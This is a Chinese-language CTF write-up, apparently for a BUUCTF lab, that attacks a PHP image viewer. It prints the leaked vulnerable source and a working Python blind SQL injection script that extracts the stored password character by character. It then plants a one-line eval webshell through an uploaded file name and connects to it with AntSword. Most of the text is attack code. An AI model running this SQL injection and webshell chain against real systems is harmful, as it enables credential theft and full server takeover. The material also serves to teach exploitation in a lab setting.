查看源码点击image.php?id=1看一下,不一样的id对应了不一样的图片。
robots.txt泄露备份文件,image.php.bak查看源码
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
addslashes会在单引号,双引号,反斜杠前面加一个/来转义。然后经过str_replace把\0,500,\','都替换成空。那如果我们输入?id=\0,经过URL第一个\用来转义传进去的id就是\0,然后addslashes又把它变回\0,经过strreplace变成\,就可以把'{$id}'的第二个单引号转义,第一个单引号跟path的第一个单引号闭合。我们可以在path变量里传任何参数执行只要把最后一个单引号闭合了就行。
import requests
url = "http://8f6bddb9-6974-4f8a-a148-4070a9553a3e.node4.buuoj.cn:81//image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select password from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
l = 1
r = 130
mid = (l + r)>>1
while(l<r):
payloads = payload.format(i,mid)
print(url+payloads)
html = requests.get(url+payloads)
if "JFIF" in html.text:
l = mid +1
else:
r = mid
mid = (l + r)>>1
result+=chr(mid)
print(result)
爆一遍username和password,JFIF是图像的一种存储格式。但因为id错误的话什么也不会显示,所以哪怕用’1‘也可以。
登录成功后是一个文件上传页面,你上传的文件名会被登记在如下的php文件里,那我们可以用文件名写一句话木马,然后用蚁剑连接这个php文件。
php被过滤了,所以要把<?php @eval($_POST['hack']);?>改成<?=@eval($_POST['hack']);?>。上传成功后蚁剑连接
http://8f6bddb9-6974-4f8a-a148-4070a9553a3e.node4.buuoj.cn:81/logs/upload.c197fa5bd8827307f85d3b918516bf36.log.php
